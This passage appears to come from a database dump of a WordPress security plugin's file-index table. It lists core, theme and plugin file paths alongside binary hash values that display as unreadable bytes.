k','',0,'?'),('�\njݍea!�\ZWd�q','wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"<8���.���K�\'',' \ZYӵ�˼*�,Q�L�Y{�㬣p�\r�h���','',0,'?'),('���G}�7��]\n�','wp-content/themes/newsmag/inc/admin/welcome-screen/sections/recommended-plugins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ޅ�����c\"ɂ','�䞩���J���3��r.�j���\\���/Ӫ�','',0,'?'),('�*�F�p���GP\\�$��','wp-content/themes/quicksand/js/lightgallery/js/lightgallery.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2���{L���h/��','J�?�ݐ!���0d���P��O}�ML�ʠ^','',0,'?'),('�-i,�Q\"\"���QH�W','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/hint/xml-hint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�Յ�Bb�}�yWi','C-q�K�8�	/Sٷ��sN^�?��8ŸI','',0,'?'),('�-n�$.�#g%�}�','wp-content/plugins/wordfence/lib/Diff/Renderer/Html/SideBySide.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �OّCH�ؖs� ','pX���uc{�-�K׏ژ�/OnE0���)JB','',0,'?'),('�-ƈ�}�N��\0v�v�','wp-content/themes/singularity/single-discussion-topics.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��b�L��>��l��b','h!|7v6\"�<���d�\n�wp(r�`m_�}��<','',0,'?'),('�0���R�J�{y�ˣ��','wp-includes/general-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lGfBp�X0=�aESy','�qǼ<�x��Ӡ�A��X/rUCG�lW�\n*e','',0,'?'),('�F �8�+�)��r�P�','wp-admin/images/no.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k�d�$��ܟV7�','\n�>���~h�Z���P\0�U0�;\' {�)	�>','',0,'?'),('�M\Z���H�?ͲZ','wp-includes/class-wp-rewrite.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c���x�X��C��u%#','ݐ/#N`j�R�1�t+��s�W�]�~S���mǗ','',0,'?'),('�Oӿ�;�=\\J�zy','wp-includes/js/tinymce/plugins/wpgallery/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cdxo&l�g�8�3��','�h_�8��r0�y-��\nϥ��KL-� {','',0,'?'),('�QF�0t�+�����','wp-includes/css/dist/block-library/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{`�q���\'2P','Wf�y�����7hc��ajkgd�4��8�ɢ��','',0,'?'),('�ZTs�k���A�:\"[�','wp-content/themes/graduate/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�r@CES�h�U7\0�C','�J�_)m�C3�Ooېu�����Pw��#��#�','',0,'?'),('�a��u\"9s?�H����','wp-content/plugins/wordfence/lib/WFLSPHP52Compatability.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%1�s���ËG','E��Wٳ�?�4��@U?�0���bP�+�h','',0,'?'),('�b����\0�a ¢ʛe ','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/fold/markdown-fold.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x;V� \0E�)`� ','�0���+�5߯��2{�\Z�(�\r *�g��','',0,'?'),('�s��Zz�`x�mf: ','wp-content/themes/twentytwentyone/assets/sass/01-settings/global.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v���]��c��ț��&','mrO�z�Iy�Dz��q�v�˘qZ�����i�','',0,'?'),('�{\rՍ.0��`�On��','wp-admin/images/about-header-brushes.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n�:Uy-�ܴ#','��{�kZxS?�t\"Q���?�(�n�r3��','',0,'?'),('�{��t��`Uv$�.ʲ','wp-content/themes/wp-simple/inc/kirki/includes/class-kirki-explode-background-field.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ƶm���x�F��I','dD@w��C��v��ELgR��_��TF�?DWu','',0,'?'),('�x�D�.���m~<�2','wp-content/plugins/wordfence/images/ratelimiting.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0[��M�ɞ�yP��','�@����S��y\'�N+�k�B��3�J!PbƖ�','',0,'?'),('��C[�Ғ����','wp-content/themes/hitmag/inc/kirki/assets/scss/controls/number.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϟ�C���U�{�','*Cz��I�;�R*��$��wE�pv���Qp�','',0,'?'),('눬��VRmT�.OO*�','wp-content/themes/singularity/js/zoom.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o�o���LMŽ��','}���Q�m��\"�n?8w痫F�$@�G��','',0,'?'),('��`�\0�8�}��','wp-content/themes/simpleshift/parts/error-no_results.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[���{p��6','���`���N$@�*����U���~�A/7','',0,'?'),('��k<������#���','wp-content/themes/hitmag/template-parts/authorbox.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q|�ҿ�%>������','̰l�(\0���ڵ*�+(��ωz�d���\Z��_','',0,'?'),('뭷\r�!z}ML�K�E','wp-includes/ms-files.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�]G���y��2D','�Z�h�x�^�/������#���Z^N��_\Z','',0,'?'),('��Sڰp��GMǯ�l�','wp-includes/css/media-views.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���5w�pأ����','3ֳ���}��!p�B����A����)k�{�F�','',0,'?'),('��((�u�X���w/','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/css/less.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���G-�M�@�x��]','Ll\rK�:2������\Z:,��h��\"��=�ݪ','',0,'?'),('�2�|�?�]���ϸ�','wp-includes/css/dist/nux/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�L��g�a�J\\','��)��v5i�B�:#��%����N�����','',0,'?'),('����x+o��p��MW�','wp-content/themes/wp-simple/assets/images/glyphicons-halflings.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%3�p�����s��\n','P#}�Ym�o�vÀJh�Fr)���X-p','',0,'?'),('���׮F��p�s��4�','wp-content/plugins/wordfence/images/back_enabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���]����H��','���9퇥)R�$px#��q ������{#L�O�','',0,'?'),('��Sxr�C�9���','wp-content/themes/simpleshift/inc/kirki/assets/images/2cl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̯nj��h�\'Y�','���g:�s�\'\\���9S����>,�d[�e&u���','',0,'?'),('��vA�ds�����K�]','wp-admin/post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xS���v�N���','�� u�����yA�Ү�B���(��B6�����','',0,'?'),('�މ[|�\r�b�sy','wp-content/themes/newsmag/inc/admin/welcome-screen/welcome-screen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V��K�;D� |�gL�','���TuԞ-SD�b+�VV9f�}����{','',0,'?'),('��YC��o�oR�亞�','wp-includes/capabilities.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Iu,�I��WN�7','<�P�ёxC�eo�I)O_d�/�wg�w�1�','',0,'?'),('���@l�UM�?���c�','wp-content/themes/newsmag/template-parts/after-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#]���oTg�[X&r�','\"%�shW�d���e�4���IS%—oU\"x�','',0,'?'),('��G�gn=.���%1','wp-content/themes/graduate/assets/js/unminified/navigation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','` @���.&8��#o�z','�O�U�S�ψNt��-WS�\0d�B���5���','',0,'?'),('�ۅnPE6��T����','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/Request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��KdW���ؿE�W��','�R��W].da����s��JM�Lq+p�},�','',0,'?'),('�+��^�њ��\r�k','wp-content/plugins/wp-cerber/assets/flags/is.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4o�$�^z1�T�ɪ�','�XƠ8�\'��*ӱ4�$���G\"��JD8�@�6','',0,'?'),('����3	�ꆐ�-=�','wp-content/themes/newsmag/assets/sass/media/_captions.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L}�1�������ј','�X�z��n��ѕu�\0��r���a��&}t�','',0,'?'),('�\'�@D�O�>\n�f�','wp-content/themes/wp-simple/inc/kirki/assets/images/kirki-toolkit.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l)����.���5��@','�������th}�9r��N�f��s+k����8','',0,'?'),('�8�ڧ��s}�ն�Ni','wp-includes/class-phpmailer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��F!;� 2󱻱4�&','G��ZG����5�_ܚ��XS[W��S:9p@�?�','',0,'?'),('�?����h�����;','wp-includes/js/quicktags.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':}���҈P��٭�','=���/���f2A|��d���<��z�N�K=�','',0,'?'),('�D\rh}�����!\n','wp-includes/js/jquery/ui/effect-drop.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[/�Zo[�Ǵ��/.','ʧ���^5��S]@\"�� 9�~G��[Tv8�7�','',0,'?'),('�Pط��悇̺ƴ$@�','wp-includes/SimplePie/HTTP/Parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':p��d\'�$�/','��=�D��=u�~�Ju`�Y[�#*�Γ�','',0,'?'),('�_��rF���Pt8R�','wp-content/themes/chronus/assets/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�P狤��0�ȸ�','��Z^��e�\Zw�f4�Y%K�$(wX�Lܞ','',0,'?'),('�}(^��8,~hyg���','wp-content/plugins/wp-cerber/wp-cerber.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[k�nG���ˡ\"14a','��)Y�.=��E)�#�V W8!E7LOl�','',0,'?'),('�|�`y�YĶ�����o','wp-content/themes/twentytwentyone/postcss.config.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��446ZN�p���T','=SmV��5�9�H�bS�V�u��b��:r�?���','',0,'?'),('쑈��UY�\'ш6U��','wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-color-palette-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j�X�FV�m�U�9�','��c�&8�rwϜޮ�?�[6\\��	�����','',0,'?'),('��c��.D�r� |��','wp-includes/js/tinymce/skins/wordpress/images/dashicon-no.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R���Z�?f.��8��	','��.c%�c�*G~�բ>�Yd���:�7�j','',0,'?'),('��\"εZH�`���','wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-radio-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i8ɬ��ϋcB��N','L��9!�\\w�9�DW{���Mֆ�31Lzq1','',0,'?'),('츃�v��6�;�~�','wp-includes/js/tinymce/utils/mctabs.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','끡�\"Y����>xU季','%�Y}ڿ�&)���MaYg��Ѝ���*�l�','',0,'?'),('��!<����B4\ZS�}','wp-content/plugins/wordfence/views/scanner/issue-postBadURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��u�@ަ�$����,','�dٍ|�]���Q��!�Qw����;���`7Zf','',0,'?'),('�[���Ӄ��2�W','wp-content/plugins/wordfence/views/waf/options-group-basic-firewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�I5�)��JD��\\','��w5ޏ���+>�c\r����^⽍B�]�','',0,'?'),('��1A`�geu9','wp-content/themes/quicksand/js/flexslider/images/bg_play_pause.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����v�r��R�\n�','�j�\'�)A����72O�*���W�d����N','',0,'?'),('�j�eg&c\0d��x�','wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"b���9�B]���2','u�^K���\n���ih��C�d.i�H�-��j�l�','',0,'?'),('��h�LzF�˱�=w;�','wp-content/themes/advance/inc/kirki/assets/images/kirki-toolkit.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l)����.���5��@','�������th}�9r��N�f��s+k����8','',0,'?'),('�-x�(�E�oI�=�','wp-includes/class-wp-customize-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`;�V�\'���(��)','�<s�Jm�ha�!������U\0(0�D\'�F�','',0,'?'),('��%O�]T�˶�`�','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/runmode/runmode-standalone.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T��TH�ߵ?�<��t�','@%��C�M��7���+�!GJ�z�E�%^<��_','',0,'?'),('��~*>7��&�]^q0','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/hint/anyword-hint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k���\0~�r�[�','�ʒ�UH<.�A{{.\Z�^����vFY��b\'','',0,'?'),('���hDK���a','wp-content/themes/city-store/inc/settings/city-store-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��5�b��L	�8o�','BlJT뾅gyGȳ�?�lM���c��@s�^1','',0,'?'),('�Aubʲ/X\0���','wp-content/themes/authorize/assets/stylesheets/font-awesome/scss/_larger.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y1VooƭV����','�0*?�TW�釧�3�s�<��K@����*Q','',0,'?'),('�Ư��0~\rjA4u','wp-includes/css/customize-preview-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E��?��nZ���d�-','G���i�\rl�iU^��n��rm�5��Ώۻ�\\l�','',0,'?'),('�ᓌB�[+r��p_�','wp-content/themes/graphene/images/social/lastfm.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8+|��J�*�b�y�u','<S�eK|�4�նEB�W�­K,ۻ�R�3�','',0,'?'),('�\\�S�Շ��8��;2','wp-includes/class-wp-tax-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}���nBJw�k�0','��,�In����\n��׋�E,��@�h�1����','',0,'?'),('�	�ƞ�J>�\\�00','wp-content/themes/wp-simple/inc/kirki/kirki/includes/output/field/class-kirki-output-field-typography.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�^7�c�����[�L�','�����3�K��3\Z�%��l�U�x2ˋ=2�','',0,'?'),('���mה��F@$�~r','wp-content/plugins/wordfence/views/onboarding/disabled-overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ofl��A�7�A���','�L���9w����v�G�hK!g�n��g�Cd','',0,'?'),('�%��|f�z��9T�/','wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-generic-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[&�Mc��=�k,�ڱ`','���r橛��#YW�E�	�B\Zh����ʤ��','',0,'?'),('�0T��d�4��K��','wp-content/themes/catch-flames/content-quote.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j|ڧ)��}l\'��}','7��Zt�\"��hɊ�:@M�eFȄ@T۴','',0,'?'),('�<��(���ߪ�-�n,','wp-content/themes/weblog/acmethemes/customizer/options/pagination.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M�n�\'z�n�޼�l�','��@[���h�m�,�2��I���SIז','',0,'?'),('�N��\'�!\rB�j��3�','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\H��!#���>b�W��','�&�x��w�α�h��)�œ@5m��.)9�R','',0,'?'),('�OR(ǹ����O��','wp-content/themes/twentytwenty/assets/js/customize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�S�a�N���x0�e\\','\ZY_��tz�)8��b#���D}%]��Dmy��YV�','',0,'?'),('�O�	�==�	�~J^=','wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/spacing.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|b�)5�2=�S9�dF�','7��\0bH,2�_9��&��=���]$S��T�V�','',0,'?'),('�VڕBI8?�5�`��','wp-content/themes/brickyard/functions/about/images/premium.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#����	��>l�z��','F�\\q]hͽ���O�d����_$%#x�14','',0,'?'),('�[->̺}+�1=�3��,','wp-content/themes/graphene/js/buttons/error.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�٤�nF�9TsB�ͩ�','!ܬ�Τf(NN�p�cu7W��wv�=X��lG<�','',0,'?'),('�]��@�\n��>ĺ�Yn','wp-admin/admin-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S}d��D��TN�\"F�','F�ԝ�q��`�멾���r_���Ȩ_���\'��I','',0,'?'),('�k�J��g܋J�T�C/','wp-content/themes/graphene/style-print.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y	o�x�C(|Ϧ','C�1p��A~Jg$8�vc�EF(/�+�����','',0,'?'),('���I0��B,�hʛp','wp-includes/class-wp-term-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y\"������4XYt[','��m⟮/�a�Ͳ(yMG.��dЪZ+����','',0,'?'),('�������賮]','wp-includes/customize/class-wp-customize-code-editor-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��jM�і���lM��_','�xFZ�Kc��3�7�`Ԫ$j�g�]�Q��','',0,'?'),('�Z�\Z�5\n�j�}�@','wp-includes/blocks/buttons/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T���9���D?_�7E','��Y]K܊�QS駤��k;�	ͥ�{/ʅ�j�','',0,'?'),('�F�����m���','wp-content/plugins/wordfence/modules/login-security/views/options/option-label.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|<��>sZ�K�z�e','�̆;�n�E��!��Z�\ZV��V H��w','',0,'?'),('�Z�\ZaYH\0 �5�~ ','wp-admin/includes/class-wp-automatic-updater.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-Wŝ#���\"Z��Ɣ]E','f?��Y4e��+���~�ěw�K7�w�Mu���','',0,'?'),('���@�g�^}u�d	','wp-content/themes/hitmag/inc/extras.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j5���#eȇ���Tg','�󙧫=�j\r�f[<�(e��\\��w�۽N��','',0,'?'),('�QR\"��@3��v�S','wp-admin/js/link.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g�֞`�1ٕx�w��','����^���R+Ȝ�I5S$i���\0����2�','',0,'?'),('�G� ��~���`�','wp-includes/customize/class-wp-customize-nav-menu-name-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7�f�W�՚7���','p��v�w ��ܪ9����?���a���z�','',0,'?'),('��f�W�4���%���','wp-content/plugins/wp-cerber/assets/flags/nz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X	�7�7��c.�ujߖl','4ȯYI4�T)��H�;�rd�Q��g���Ӆ','',0,'?'),('��M�B�!:�','wp-content/plugins/wp-cerber/assets/flags/it.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{/�z]�>��F@�B�','ⴟ��k �9b��md6�l�{e� o���','',0,'?'),('��n;�+��_�A��3x(','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/display/fullscreen.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��LO�c��!��(�g','��ax����Ŵ�)�lL�m�ݵ���B�o*���8�','',0,'?'),('��\Za�]]�A��\'h���','wp-admin/network/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�iҎ�L�>�e�*�.��','�+Vƃ/�gyg>��\'$�L*yXc� �w�a5','',0,'?'),('����t�x������','wp-content/themes/chronus/rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5Z��v��oݳU%�K�','��T.�o�\Zi$���w���-����.��!�ك','',0,'?'),('����=�c�ه���','wp-admin/includes/upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������\\ƥ�/��','�+�w}�U�K�f�%f�q��荁��im��\Z��','',0,'?'),('��eC����Di!��','wp-admin/css/colors/coffee/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��s�[0�\n��2-�','a����RC�J)�!�{Mt@�B}�\n�G�5��\0','',0,'?'),('�?I=�(�E�\'(��','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/merge/merge.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D��x��LE�U���','qv�OL�щ:�\\!�BM`��c\n��8W�J�S','',0,'?'),('���f�%u�P���','wp-includes/js/mce-view.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����<��@^�P�\'','#��	��\\P�Wdqߋ��.��4Ó��x<�','',0,'?'),('�\Z���{:\Z���4f','wp-includes/js/customize-preview-nav-menus.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m �l�VҪ3���','�5,��M3�5��n(tL5��;^��P/9z���8','',0,'?'),('�.�z��&���.�1y��','wp-includes/css/dist/format-library/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t���A8�x��l�','K�cK��&�2�\0���=��g�.�ٜ��	\0y','',0,'?'),('�3ׅf�D�1x��k�','wp-content/themes/graduate/inc/widgets/social-link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4m���?�hh����','C\'ũj\06d�f֮r����b��F@OI�[�U','',0,'?'),('�4�,�,DO-\r8�r~','wp-content/themes/newsmag/assets/sass/forms/_forms.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.C�D|փ�!b�Q���','h��VC{�B�{���4O�b�]=��;X)��(X�','',0,'?'),('�H��\\�\\�j��ѕ7','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-preset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O���=H�(!�-y�','�d��u�D�:}��LD�pX�Le¸|���\r�','',0,'?'),('�R�w�7�$�q�2Sh','wp-content/themes/brickyard/docs/assets/blueprint-css/screen.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D2t\rGɅX�\nz�`�','��`��=�^�e���^�AH`���\n�S�','',0,'?'),('�yѼ5��!*�� ��','wp-content/themes/twentytwentyone/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�gd�w���}�$\'e�','E�u)��l��E�4����觏�篓�W���zF','',0,'?'),('��v�:I�%7\\��0�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/twig/twig.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����d�\Z�hW\'(�B','g(MԲt��P�df�:=�k�{��⌻�{Dr��','',0,'?'),('6;(r���Y�F ','wp-content/themes/singularity/inc/customizer-library/extensions/utilities.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��>��gY��K��}W','|p9�X���(z�W�yM.v�%��k�����','',0,'?'),('�=�KOBԹb�2�','wp-content/themes/catch-flames/wpml-config.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z<�<��\\ꑞy�/�wx','z�Iȍ�ԇg5\Z�ӻ!Pυ�����ҥ��}��%','',0,'?'),('�ۺ�\Z$=ߴ�U:�`','wp-content/themes/auberge/includes/welcome/welcome.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n`i_��{�`Ϥ��{','m������ZZ�����j�>��5�Ygs','',0,'?'),('��N���F�V�Y�C','wp-includes/blocks/shortcode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0t�	�ڨ.�j�','{��bw\n~��4�n\"��\"�����#.m�/#1','',0,'?'),('��uy�؟�uV��@/��','wp-includes/class-wp-block-patterns-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O�>�O^��\"����','͊�Y��V�y���}��&m�{�5jJ)0�!','',0,'?'),('���%&}�\Zʤfc�	','wp-content/themes/event/page-templates/contact-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A�^c��#�|C��','0���p�r����%������]j�V��','',0,'?'),('����D��nk���','wp-content/themes/twentytwentyone/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wu�e\Z�A�K�	m�','Uř�����!¿r�Iq�q�[�j�BCY�Pl%','',0,'?'),('�@}&�J~�¾&��\0','wp-includes/customize/class-wp-customize-new-menu-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N��p��aC�q�k','�F��0�Hyce�LuQ���&��LiH\n�DũK','',0,'?'),('�Z�jϡ{�5�z;�m�','wp-content/themes/skt-pathway/inc/extras.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��F�s.���TW�$�','D���Q;CT2��I�Iw\0�ŋI�\"��Y�N�','',0,'?'),('�R�V3�*k8l���[','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/markdown/test.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4���͞�w�|r�@CkP','�8b��PN_a���vaʪ2���H?�\n�ƭ','',0,'?'),('�&#�Х�Q`��h�ğ','wp-content/themes/gildrest/template-parts/common/archive-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�y�2�4�z�0{/4','��;�4�/��e��̡�l*�g\'/�}�Is','',0,'?'),('�(Q�_f^131X��','wp-content/themes/gambit/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��~:��%�ӯ4��X','-v6Ll�,��7�\\z�aM�[ն&Gw���','',0,'?'),('�(�Ӌ\Z �r��O�','wp-content/themes/auberge/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��u�h_���\n��C0\n','9-֣gVҿ��\r��r��8��u��:��ν�=','',0,'?'),('�6Q�>�0�����\'_','wp-content/themes/edge/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3ۨԮ �d�R��','B�Q�i+@ۏ���w�,D9�,�L��L{tӫF�[','',0,'?'),('�F�m��9-n7\Z�u','wp-content/themes/quicksand/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7��|#�uX���3','��JW;�c�����rm��[��Z��3�1r�l','',0,'?'),('�H\Z���.���hR�bn','wp-content/plugins/wp-cerber/assets/flags/io.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<���e�e���C�','��ɫ-�)i�l�\na�1��}!�}~����	pd�','',0,'?'),('�I��.IB�a�|G���','wp-content/themes/hitmag/inc/customizer/custom-controls/section-pro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u�/�t�#�x9���','���v��u3`bXv��I#ӷ+���%�r���','',0,'?'),('�U�����|�[՜RY','wp-content/themes/wp-simple/inc/kirki/kirki/includes/deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"\'�f�C�2Њ','\03c��k���if{��\Z�g��6��kW���','',0,'?'),('�Y^~5~��p�G-���','wp-includes/js/customize-views.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Hӷ�-\\Me���','�b����L��-���9wlo��y�$+�Y\Zޘ�N','',0,'?'),('�Z�����E�bUyf','wp-content/themes/enigma/css/font-awesome-4.7.0/less/icons.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����kdo�W7��ڔ�','�)ȝ����\\\\d�&�QΊ�4�3||���I��w�','',0,'?'),('�b�m|\"�[^�oh��','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-toggle-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�ikox�E%��x�U','G�M\"R��W.`�x������֎.�Q�\\��i�K','',0,'?'),('�m�b(ʪ�!L\\\'�\nGm','wp-content/themes/simpleshift/inc/kirki/assets/js/kirki-branding.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@��وn���nĊ��','��-P��XIv�`�!��=�*